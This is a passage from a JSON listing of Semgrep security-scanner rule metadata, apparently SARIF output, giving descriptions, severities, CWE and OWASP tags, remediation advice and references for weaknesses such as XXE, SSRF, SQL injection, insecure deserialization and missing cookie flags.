Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.audit.jose-exposed-data.jose-exposed-data"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"help":{"markdown":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type)\n - [https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html](https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html)\n","text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","id":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","name":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"help":{"markdown":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service)\n - [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io)\n","text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","id":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","name":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"help":{"markdown":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","id":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","name":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/](https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django","id":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","name":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-joblib-django.tainted-joblib-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","id":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","name":"kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","id":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","name":"go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"help":{"markdown":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel)\n - [https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ](https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ)\n","text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","id":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","name":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"help":{"markdown":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw)\n - [https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===](https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===)\n - [https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027](https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027)\n","text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","id":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","name":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"help":{"markdown":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","id":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","name":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell","id":"ruby.lang.security.dangerous-subshell.dangerous-subshell","name":"ruby.lang.security.dangerous-subshell.dangerous-subshell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-subshell.dangerous-subshell"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"help":{"markdown":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection)\n - [https://laravel.com/docs/8.x/queries](https://laravel.com/docs/8.x/queries)\n","text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection","id":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","name":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-sql-injection.laravel-sql-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint","id":"rust.hyper.sql.postgres-taint.postgres-taint","name":"rust.hyper.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"help":{"markdown":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","id":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","name":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","id":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","name":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"help":{"markdown":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write)\n - 